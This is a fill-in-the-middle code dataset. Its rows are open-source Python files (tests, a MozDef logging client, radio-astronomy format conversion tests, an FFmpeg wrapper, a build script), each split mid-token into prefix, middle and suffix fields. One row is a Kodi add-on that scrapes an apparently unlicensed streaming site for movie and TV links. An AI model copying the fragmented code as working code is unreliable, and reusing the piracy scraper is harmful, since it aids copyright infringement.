repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
allohakdan/minibus
|
test/test_syntax.py
|
Python
|
apache-2.0
| 1,148
| 0.008711
|
import unittest
from jsonschema import SchemaError
from minibus import MiniBusClient
class SyntaxTest(unittest.TestCase):
def setUp(self):
self.client = MiniBusClient()
def callback(self):
pass
def callback2(self):
pass
def test_sub_good(self):
self.client.subscribe("test_sub_good", {'type': "number"}, self.callback)
def test_sub_bad_schema(self):
self.assertRaises(SchemaError, self.client.subscribe,
"test_sub_bad_schema", {"type": "orange"}, self.callback)
def test_sub_schema_mismatch(self):
self.client
|
.subscribe("test_sub_schema_mismatch", {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_mismatch", {"type": "string"}, self.callback2)
def test_sub_schema_dupcallback(self):
self.client.subscribe("test_sub_schema_dupcallback", {"type": "number"}, self.callback)
|
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_dupcallback", {"type": "number"}, self.callback)
if __name__ == "__main__":
unittest.main()
|
sabinaczopik/python_training
|
test/test_edit_contact.py
|
Python
|
apache-2.0
| 949
| 0.004215
|
from model.contact import Contact
from random import randrange
def test_edit_contact(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(first_name ="Sabina", last_name="test", company="Pewex",
address="osiedle", phone_home="123456789", e_mail="[email protected]",
|
year="2016",))
old_contact = db.get_contact_list()
index = randrange(len(old_contact))
contact = Contact(first_name='
|
Kasia', last_name='Bober')
contact.id = old_contact[index].id
app.contact.edit_contact_by_index(index, contact)
assert len(old_contact) == app.contact.count()
new_contact = db.get_contact_list()
old_contact[index] = contact
assert old_contact == new_contact
if check_ui:
assert sorted(new_contact, key=Contact.id_or_max) == sorted(
app.group.get_contact_list(), key=Contact.id_or_max
)
|
ameihm0912/mozdef_client
|
mozdef_client.py
|
Python
|
mpl-2.0
| 20,473
| 0.00254
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2014 Mozilla Corporation
# Author: [email protected]
# Author: [email protected]
import os
import sys
from datetime import datetime
import pytz
import json
import socket
import syslog
# http://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/limits-messages.html
SQS_MAX_MESSAGE_SIZE = 256 * 1024
try:
from requests_futures.sessions import FuturesSession as Session
futures_loaded = True
except ImportError:
from requests import Session
futures_loaded = False
try:
import boto3
boto_loaded = True
except ImportError:
boto_loaded = False
import unittest
class MozDefError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MozDefMessage(object):
# Supported message types
MSGTYPE_NONE = 0
MSGTYPE_EVENT = 1
MSGTYPE_COMPLIANCE = 2
MSGTYPE_VULNERABILITY = 3
MSGTYPE_ASSETHINT = 4
MSGTYPE_RRA = 5
def __init__(self, url):
self._msgtype = self.MSGTYPE_NONE
self.log = {}
self._sendlog = {}
self._httpsession = Session()
self._httpsession.trust_env = False
self._url = url
self.hostname = socket.getfqdn()
# This is due to some systems incorrectly
# setting the hostname field to localhost.localdomain
# so, we add logic to use a different 'hostname' method
# if that's the case
if self.hostname == 'localhost.localdomain':
self.hostname = socket.gethostname()
# Set some default options
self._send_to_syslog = False
self._send_to_sqs = False
self._syslog_only = False
self._fire_and_forget = False
self._verify_certificate = False
self._verify_path = None
def validate(self):
return True
def validate_log(self):
return True
def set_verify(self, f):
self._verify_certificate = f
def set_verify_path(self, p):
self._verify_path = p
def set_fire_and_forget(self, f):
self._fire_and_forget = f
def set_sqs_queue_name(self, f):
self._sqs_queue_name = f
def set_sqs_aws_account_id(self, f):
self._sqs_aws_account_id = f
def set_sqs_region(self, f):
self._sqs_region = f
def set_send_to_sqs(self, f):
self._send_to_sqs = f
def set_send_to_syslog(self, f, only_syslog=False):
self._send_to_syslog = f
self._syslog_only = only_syslog
def syslog_convert(self):
raise MozDefError('message type does not support syslog conversion')
def construct(self):
raise MozDefError('subclass of MozDefMessage must override construct()')
def _httpsession_cb(self, session, response):
if response.result().status_code != 200:
if not self._fire_and_forget:
raise MozDefError('POST failed with code %r' % \
response.result().status_code)
def send_syslog(self):
raise MozDefError('message type does not support syslog submission')
def send(self):
if not self.validate():
raise MozDefError('message failed validation')
self.construct()
if not self.validate_log():
raise MozDefError('message failed post construct validation')
if self._send_to_syslog:
self.send_syslog()
if self._syslog_only:
return
if self._send_to_sqs:
self.send_sqs()
return
vflag = self._verify_certificate
if vflag:
if self._verify_path != None:
vflag = self._verify_path
buf = json.dumps(self._sendlog, sort_keys=True, indent=4)
# Compatibility notes:
# When updating either path (futures_loaded or not loaded) please ensure both have the same functionality
# future_loaded is used by Python 2, the non-loaded version if for Python 3
if futures_loaded:
self._httpsession.post(self._url, buf,
verify=vflag,
background_callback=self._httpsession_cb)
else:
response = self._httpsession.post(self._url, buf,
verify=vflag)
if response.ok == False:
if not self._fire_and_forget:
raise MozDefError('POST failed with code %r msg %s' % \
(response.status_code, response.text))
# Simple Message Submission
#
# This class wraps the new MozDefEvent class to provide support for
# older applications that use the legacy API, and provide simplified access
# to generation of event messages.
class MozDefMsg(object):
def __init__(self, hostname, summary=None, category='event',
severity='INFO', tags=[], details={}):
self.summary = summary
self.category = category
self.details = details
self.tags = tags
self.severity = severity
self.hostname = hostname
self.log = {}
self.log['details'] = {}
self.log['tags'] = []
self.fire_and_forget_mode = False
self.verify_certificate = True
self.sendToSyslog = False
self.sendToSqs = False
self.sqsQueueName = None
self.sqsAWSAccountId = None
self.sqsRegion = None
self.syslogOnly = False
de
|
f send(self, summary=None, category=None, severity=None, tags=None,
details=None):
tsummary = summary
tcategory = category
tseverity = severity
ttags = tags
tdetails = details
if tsummary == None:
tsummary = self.summary
if tcategory
|
== None:
tcategory = self.category
if tseverity == None:
tseverity = self.severity
if ttags == None:
ttags = self.tags
if tdetails == None:
tdetails = self.details
amsg = MozDefEvent(self.hostname)
amsg.set_simple_update_log(self.log)
amsg.summary = tsummary
amsg.tags = ttags
amsg.details = tdetails
if type(self.verify_certificate) is str:
amsg.set_verify(True)
amsg.set_verify_path(self.verify_certificate)
else:
amsg.set_verify(self.verify_certificate)
amsg.set_fire_and_forget(self.fire_and_forget_mode)
amsg.set_category(tcategory)
amsg.set_severity_from_string(tseverity)
amsg.set_send_to_syslog(self.sendToSyslog,
only_syslog=self.syslogOnly)
amsg.set_sqs_queue_name(self.sqsQueueName)
amsg.set_sqs_aws_account_id(self.sqsAWSAccountId)
amsg.set_sqs_region(self.sqsRegion)
amsg.set_send_to_sqs(self.sendToSqs)
amsg.send()
class MozDefVulnerability(MozDefMessage):
def validate_log(self):
for k in ['utctimestamp', 'description', 'vuln', 'asset',
'sourcename']:
if k not in self._sendlog.keys():
return False
for k in ['assetid', 'ipv4address', 'hostname', 'macaddress']:
if k not in self._sendlog['asset'].keys():
return False
for k in ['status', 'vulnid', 'title', 'discovery_time', 'age_days',
'known_malware', 'known_exploits', 'cvss', 'cves']:
if k not in self._sendlog['vuln'].keys():
return False
return True
def construct(self):
self._sendlog = self.log
def __init__(self, url):
MozDefMessage.__init__(self, url)
self._msgtype = self.MSGTYPE_VULNERABILITY
class MozDefEvent(MozDefMessage):
SEVERITY_INFO = 0
SEVERITY_WARNING = 1
SEVERITY_CRITICAL = 2
SEVERITY_ERROR = 3
SEVERITY_DEBUG = 4
_sevmap = {
SEVERITY_INFO: ['INFO', syslog.LOG_INFO],
SEVERITY_WARNING: ['WARNING', syslog.LOG_WARNING],
SEVERITY_CRITICAL: ['CRITICAL', syslog.LOG_CRIT],
SEVERITY_ER
|
mhvk/baseband
|
baseband/tests/test_conversion.py
|
Python
|
gpl-3.0
| 19,399
| 0
|
# Licensed under the GPLv3 - see LICENSE
import pytest
import numpy as np
import astropy.units as u
from astropy.time import Time
from .. import vdif
from .. import mark4
from .. import mark5b
from .. import dada
from ..base.encoding import EIGHT_BIT_1_SIGMA
from ..data import (SAMPLE_MARK4 as SAMPLE_M4, SAMPLE_MARK5B as SAMPLE_M5B,
SAMPLE_VDIF, SAMPLE_MWA_VDIF as SAMPLE_MWA, SAMPLE_DADA,
SAMPLE_BPS1_VDIF)
class TestVDIFMark5B:
"""Simplest conversion: VDIF frame containing Mark5B data (EDV 0xab)."""
def test_header(self):
"""Check Mark 5B header information can be stored in a VDIF header."""
with open(SAMPLE_M5B, 'rb') as fh:
# Start time kiloday is needed for Mark 5B to calculate time.
m5h1 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# For the payload, pass in how data is encoded.
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# A not-at-the-start header for checking times.
m5h2 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# Create VDIF headers based on both the Mark 5B header and payload.
header1 = vdif.VDIFHeader.from_mark5b_header(
m5h1, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
header2 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
for i, (m5h, header) in enumerate(((m5h1, header1), (m5h2, header2))):
assert m5h['frame_nr'] == i
# Check all direct information is set correctly.
assert all(m5h[key] == header[key] for key in m5h.keys())
assert header['mark5b_frame_nr'] == m5h['frame_nr']
assert header.kday == m5h.kday
# As well as the time calculated from the header information.
assert header.time == m5h.time
# Check information on the payload is also correct.
assert header.nchan == 8
assert header.bps == 2
assert not header['complex_data']
assert header.frame_nbytes == 10032
assert header.nbytes == 32
assert header.payload_nbytes == m5h.payload_nbytes
assert (header.samples_per_frame
== 10000 * 8 // m5pl.bps // m5pl.sample_shape.nchan)
# Check that we can handle > 512 Mbps sampling rate.
header3 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps,
sample_rate=64*u.MHz)
assert header3.time == header2.time
assert header3['frame_nr'] == m5h2['frame_nr']
# A copy might remove any `kday` keywords set, but should still work
# (Regression test for #34)
header_copy = header2.copy()
assert header_copy == header2
header_copy.verify()
# But it should not remove `kday` to start with (#35)
assert header_copy.kday == header2.kday
# May as well check that with a corrupt 'bcd_fraction' we can still
# get the right time using the frame number.
header_copy['bcd_fraction'] = 0
# This is common enough that we should not fail verification.
header_copy.verify()
# However, it should also cause just getting the time to fail
# unless we pass in a frame rate.
with pytest.raises(ValueError):
header_copy.time
frame_rate = 32. * u.MHz / header.samples_per_frame
assert abs(header_copy.get_time(frame_rate=frame_rate)
- m5h2.time) < 1.*u.ns
def test_payload(self):
"""Check Mark 5B payloads can used in a Mark5B VDIF payload."""
# Get Mark 5B header, payload, and construct VDIF header, as above.
with open(SAMPLE_M5B, 'rb') as fh:
|
m5h = mark5b.Mar
|
k5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
header = vdif.VDIFHeader.from_mark5b_header(
m5h, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
# Create VDIF payload from the Mark 5B encoded payload.
payload = vdif.VDIFPayload(m5pl.words, header)
# Check that the payload (i.e., encoded data) is the same.
assert np.all(payload.words == m5pl.words)
# And check that if we decode the payload, we get the same result.
assert np.all(payload.data == m5pl.data)
# Now construct a VDIF payload from the Mark 5B data, checking that
# the encoding works correctly too.
payload2 = vdif.VDIFPayload.fromdata(m5pl.data, header)
assert np.all(payload2.words == m5pl.words)
assert np.all(payload2.data == m5pl.data)
# Mark 5B data cannot complex. Check that this raises an exception.
header2 = header.copy()
with pytest.raises(ValueError):
header2.complex_data = True
with pytest.raises(ValueError):
header2['complex_data'] = True
with pytest.raises(ValueError):
vdif.VDIFPayload.fromdata(m5pl.data.view(complex), bps=2, edv=0xab)
def test_frame(self):
"""Check a whole Mark 5B frame can be translated to VDIF."""
with mark5b.open(SAMPLE_M5B, 'rb', ref_time=Time(57000, format='mjd'),
nchan=8, bps=2) as fh:
# pick second frame just to be different from header checks above.
fh.seek(10016)
m5f = fh.read_frame()
assert m5f['frame_nr'] == 1
frame = vdif.VDIFFrame.from_mark5b_frame(m5f)
assert frame.nbytes == 10032
assert frame.shape == (5000, 8)
assert np.all(frame.data == m5f.data)
assert frame.time == m5f.time
def test_stream(self):
"""Check we can encode a whole stream."""
class TestVDIF0VDIF1:
"""Conversion between EDV versions."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_MWA, 'rs', sample_rate=1.28*u.MHz) as f0:
h0 = f0.header0
d0 = f0.read(1024)
kwargs = dict(h0)
kwargs['edv'] = 1
fl = str(tmpdir.join('test1.vdif'))
with vdif.open(fl, 'ws', sample_rate=1.28*u.MHz, **kwargs) as f1w:
h1w = f1w.header0
assert list(h1w.words[:4]) == list(h0.words[:4])
assert h1w.sample_rate == 1.28*u.MHz
f1w.write(d0)
with vdif.open(fl, 'rs') as f1r:
h1r = f1r.header0
d1r = f1r.read(1024)
assert h1r.words[:4] == h0.words[:4]
assert h1w.sample_rate == 1.28*u.MHz
assert np.all(d1r == d0)
class TestMark5BToVDIF3:
"""Real conversion: Mark5B to VDIF EDV 3, and back to Mark5B"""
def test_header(self):
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# check that we have enough information to create VDIF EDV 3 header.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=m5pl.bps, sample_shape=(1,), station='WB',
time=m5h.time, sample_rate=32.*u.MHz, complex_data=False)
assert header.time == m5h.time
def test_stream(self, tmpdir):
"""Convert Mark 5B data stream to VDIF."""
# Here, we need to give how the data is encoded, since the data do not
# self-describe this. Furthermore, we need to pass in a rough time,
# and the rate at which samples were taken, so that absolute times can
# be calculated.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fr:
m5h = fr.header0
# create VDIF header from Mark 5B stream information.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=fr.bps, nchan=1, station='WB', time=m5h.time,
sample_rate=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testin
|
acrosby/netcdf4-getncattrs
|
getncattrs.py
|
Python
|
mit
| 129
| 0
|
#
# acrosby 2013
#
def __call__(nc):
s = {}
for attr in nc.ncattrs():
s[attr] = nc.getncattr(attr)
|
return s
|
|
jeanslack/Videomass
|
videomass/vdms_threads/generic_task.py
|
Python
|
gpl-3.0
| 3,294
| 0
|
# -*- coding: UTF-8 -*-
"""
Name: generic_task.py
Porpose: Execute a generic task with FFmpeg
Compatibility: Python3 (Unix, Windows)
Author: Gianluca Pernigotto <[email protected]>
Copyright: (c) 2018/2022 Gianluca Pernigotto <[email protected]>
license: GPL3
Rev: Feb.14.2022
Code checker:
flake8: --ignore F821, W504
pylint: --ignore E0602, E1101
This file is part of Videomass.
Videomass is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Videomass is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Videomass. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
import platform
import subprocess
import wx
from videomass.vdms_utils.utils import Popen
if not platform.system() == 'Windows':
import shlex
class FFmpegGenericTask(Thread):
"""
Run a generic task with FFmpeg as a separate thread.
This class does not redirect any progress output information
for debugging, however you can get the exit status message
USE:
thread = FFmpegGenericTask(args)
thread.join()
error = thread.status
if error:
print('%s
|
' % error)
return
"""
|
get = wx.GetApp()
appdata = get.appset
def __init__(self, param):
"""
Attributes defined here:
self.param, a string containing the command parameters
of FFmpeg, excluding the command itself `ffmpeg`
self.status, If the exit status is true (which can be an
exception or error message given by returncode) it must be
handled appropriately, in the other case it is None.
"""
self.param = param
self.status = None
Thread.__init__(self)
self.start()
# ----------------------------------------------------------------#
def run(self):
"""
Get and redirect output errors on p.returncode instance and
OSError exception. Otherwise the getted output is None
"""
cmd = (f'"{FFmpegGenericTask.appdata["ffmpeg_cmd"]}" '
f'{FFmpegGenericTask.appdata["ffmpegloglev"]} '
f'{FFmpegGenericTask.appdata["ffmpeg+params"]} '
f'{self.param}')
if not platform.system() == 'Windows':
cmd = shlex.split(cmd)
try:
with Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True,
) as proc:
error = proc.communicate()
if proc.returncode: # ffmpeg error
if error[1]:
self.status = error[1]
else:
self.status = "Unrecognized error"
return
except OSError as err: # command not found
self.status = err
return
|
alice1017/coadlib
|
coadlib/loopapp.py
|
Python
|
mit
| 871
| 0
|
#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):
def __init__(self, name, desc, version,
padding, margin, suffix, encoding=ENCODING):
super(InteractiveLoopApplication, self).__init__(
name, desc, version, pad
|
ding, margin, suffix, encoding)
# loop status
self.STATUS_EXIT = 0
self.STATUS_CONTINUE = 1
def loop(self, func):
def mainloop():
loop_flag = self.STATUS_CONTINUE
while loop_flag == self.STATUS_CONTINUE:
try:
loop_f
|
lag = func()
except KeyboardInterrupt:
self.write_error("Terminated.")
self.exit(0)
self.exit(0)
return mainloop
|
elmamyra/kbremap
|
kbremap_app/keyTools/__init__.py
|
Python
|
gpl-3.0
| 12,391
| 0.011137
|
# This file is part of the kbremap project.
# Copyright (C) 2014 Nicolas Malarmey
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
# contact: [email protected]
# -*- coding: utf-8 -*-
from Xlib.display import Display
from Xlib import X, error
import Xlib
from collections import namedtuple
from gtk import gdk
import gtk
from subprocess import Popen, PIPE
from threading import Timer
from itertools import groupby
from operator import itemgetter
keyEvent = namedtuple('keyEvent', ['type', 'keycode', 'modMask'])
DEAD_KEYS = (
'grave',
'acute',
'circumflex',
'tilde',
'macron',
'breve',
'abovedot',
'diaeresis',
'ring',
'doubleacute',
'caron',
'cedilla',
'ogonek',
'belowdot',
'hook',
'horn',
'stroke',
'schwa',
'SCHWA',
)
LEVEL_MOD = (0, X.ShiftMask, X.Mod5Mask, X.ShiftMask | X.Mod5Mask, X.ControlMask | X.Mod1Mask)
class KeyTools:
KEY_PRESS = X.KeyPress
KEY_RELEASE = X.KeyRelease
def __init__(self):
self._xdisplay = Display()
self._xroot = self._xdisplay.screen().root
self._clipboard = gtk.clipboard_get()
self._clipPrimay = gtk.clipboard_get("PRIMARY")
self._entryForPaste = 118, X.ShiftMask
self._group = 0
self.loadModifiers()
self._keymap = gdk.keymap_get_default() # @UndefinedVariable
def loadModifiers(self):
self._modifiers = []
self._modifierList = []
for key in self._xdisplay.get_modifier_mapping():
li = [k for k in key if k]
#for altgr key
if 92 in li:
li.append(108)
self._modifierList += li
self._modifiers.append(li)
def filterGroup(self, entries):
if entries:
return [e for e in entries if e[-2] == self._group]
return []
def remapKey(self, keycode, keysyms):
allKeysyms = list(self._xdisplay.get_keyboard_mapping(keycode, 1)[0])
keysyms = keysyms + [0]*(4 - len(keysyms))
allKeysyms[:2] = keysyms[:2]
allKeysyms[4:6] = keysyms[2:]
self._xdisplay.change_keyboard_mapping(keycode, [allKeysyms])
self._xdisplay.sync()
def resetMapping(self):
try:
process = Popen('setxkbmap -print -verbose 7'.split(), stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
layout = variant = ''
for line in process.stdout:
line = line.rstrip()
if line == '':
break
if line.startswith('layout:'):
layout = line.split()[1]
elif line.startswith('variant:'):
variant = line.split()[1]
break
command = ['setxkbmap']
if layout:
command += ['-layout', layout]
if variant:
command += ['-variant', variant]
if layout or command:
try:
process = Popen(command, stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
def isModifier(self, keycode):
return keycode in self._modifierList
def getModMask(self, keycode):
for i, mods in enumerate(self._modifiers):
if keycode in mods:
return 2**i
return 0
def modifiersKeycodeList(self):
return self._modifierList
def numMask(self):
return X.Mod2Mask
def keycode2char(self, keycode, mods, group=0):
char = ''
name = ''
info = self._keymap.translate_keyboard_state(keycode, mods, group)
if info:
keysym = info[0]
char = gdk.keyval_to_unicode(keysym) # @UndefinedVariable
if char:
char = unichr(char)
name = gdk.keyval_name(keysym) # @UndefinedVariable
return char or '', name or ''
def removeNumLockMask(self, keycode, mod):
if not self.isKeypadKey(keycode) and mod & X.Mod2Mask:
return mod ^ X.Mod2Mask
return mod
def entry2keysym(self, keycode, modMask):
info = self._keymap.translate_keyboard_state(keycode, modMask, self._group)
if info:
return info[0]
return None
def entry2name(self, keycode, modMask):
keysym = self.entry2keysym(keycode, modMask)
if keysym is not None:
return gdk.keyval_name(keysym) # @UndefinedVariable
return None
def keycode2entries(self, keycode):
return self.filterGroup(self._keymap.get_entries_for_keycode(keycode))
def keysym2entry(self, keysym):
if not keysym:
return None
infos = self._keymap.get_entries_for_keyval(keysym) # @UndefinedVariable
if infos:
for info in infos:
keycode, group, level = info
if group == self._group:
if level < len(LEVEL_MOD):
mod = LEVEL_MOD[level]
return keycode, mod
return None
def keysym2deadEntries(self, keysym):
resp = ()
entry = self.keysym2entry(keysym)
if entry:
keycode, mod = entry
resp = ((keycode, mod), )
if not resp:
deadKeys = self.findWithDeadKey(keysym)
if deadKeys:
keyKeysym, deadKeysym = deadKeys
keyKeycodes = self.keysym2entry(keyKeysym)
deadKeycodes = self.keysym2entry(deadKeysym)
if keyKeycodes and deadKeycodes:
keyKeycode, keyMod = keyKeycodes
deadKeycode, deadMod = deadKeycodes
resp = ((deadKeycode, deadMod), (keyKeycode, keyMod))
return resp
def keycode2charsAndNames(self, keycode):
entries = self.keycode2entries(keycode)
chars = []
names = []
for entry in entries:
chars.append(keysym2char(entry[0]))
names.append(keysym2name(entry[0]))
if len(chars) >= 4:
break
while not names[-1]:
chars.pop(-1)
names.pop(-1)
return chars, names
def keycode2key
|
syms(self, keycode):
entries = self.keycode2entries(keycode)
return [e[0] for e in entries][:4]
def char2entries(self, char):
keysym = gdk.unicode_to_keyval(ord(char)) # @UndefinedVariable
if keysym:
return se
|
lf.keysym2deadEntries(keysym)
return ()
def findWithDeadKey(self, keysym):
name = gdk.keyval_name(keysym) # @UndefinedVariable
for deadName in DEAD_KEYS:
if name.endswith(deadName):
keyName = name[:-len(deadName)]
deadName = {'ring': 'abovering',
'schwa': 'small_schwa',
'SCHWA': 'capital_schwa'}.get(deadName, deadName)
deadName = 'dead_' + deadName
keyKeysym = gdk.keyval_from_name(keyName) # @UndefinedVariable
deadSym = gdk.keyval_from_name
|
dotoscat/Polytank-ASIR
|
client_setup.py
|
Python
|
agpl-3.0
| 626
| 0.033546
|
from cx_Freeze import setup, Executable
# Dependencies are automatically detected, but it might need
# fine tuning.
buildOptions = dict(packages = ["pyglet", "polytanks", "codec
|
s", "encodings", "selectors"],
excludes = ["tkinter", "PyQt5", "PIL", "setuptools"]
, include_files="assets")
import sys
base = 'Win32GUI' if sys.platform=='win32' else None
executables = [
Execu
|
table('main.py', base=base, targetName = 'cliente.exe')
]
setup(name='polytanks-cliente',
version = '1.0',
description = 'Cliente de Polytanks',
options = dict(build_exe = buildOptions),
executables = executables)
|
marduk191/plugin.video.movie25
|
resources/libs/movies_tv/oneclickwatch.py
|
Python
|
gpl-3.0
| 11,474
| 0.022486
|
import urllib,re,sys,os
import xbmc,xbmcgui,xbmcaddon,xbmcplugin
from resources.libs import main
#Mash Up - by Mash2k3 2012.
addon_id = 'plugin.video.movie25'
selfAddon = xbmcaddon.Addon(id=addon_id)
art = main.art
def LISTSP(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/movies/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/2/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/3/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/4/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/5/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/6/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/7/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/8/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/9/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/10/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/movies/','http://oneclickwatch.org/category/movies/page/2/','http://oneclickwatch.org/category/movies/page/3/','http://oneclickwatch.org/category/movies/page/4/','http://oneclickwatch.org/category/movies/page/5/','http://oneclickwatch.org/category/movies/page/6/','http://oneclickwatch.org/category/movies/page/7/','http://oneclickwatch.org/category/movies/page/8/','http://oneclickwatch.org/category/movies/page/9/','http://oneclickwatch.org/category/movies/page/10/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('<a href="([^<]+)" title=".+?".+? src="(.+?)" .+?/><br />(.+?)<br />').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Movie list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Movies loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for url,thumb,name in match:
name=name.replace('<strong>','').replace('</strong>','')
main.addPlayM(name,url,135,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Movies loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.CloseAllDialogs()
main.GA("HD","Oneclickwatch")
def LISTTV3(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/tv-shows/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/2/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/3/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/4/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/5/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/tv-shows/','http://oneclickwatch.org/category/tv-shows/page/2/','http://oneclickwatch.org/category/tv-shows/page/3/','http://oneclickwatch.org/category/tv-shows/page/4/','http://oneclickwatch.org/category/tv-shows/page/5/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('title=".+?">([^<]+)</a></h2>.+?href=".+?<a href="(.+?)" .+?href=".+?>.+?src="(.+?)"').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Show list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for name,url,thumb in match:
name=name.replace('\xc2\xa0','').replace('" ','').replace(' "','').replace('"','').replace("'","'").replace("&","and").replace("’","'").replace("amp;","and").replace("#8211;","-")
main.addPlayTE(name,url,134,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.GA("TV","Oneclickwatch")
def PLAYOCW(mname,murl):
sources=[]
main.GA("OneclickwatchT","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href=".+?" rel=".+?">(.+?)</a></p>').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url in match:
host=re.compile("http://(.+?).com/.+?").findall(url)
for hname in host:
host=hname.replace('www.','')
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
|
stream_url = False
return
infoLabels =main.GETMETAEpiT(mname,thumbs,descs)
video_type='episode'
season=infoLabels['season']
episode=infoLabels['episode']
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
|
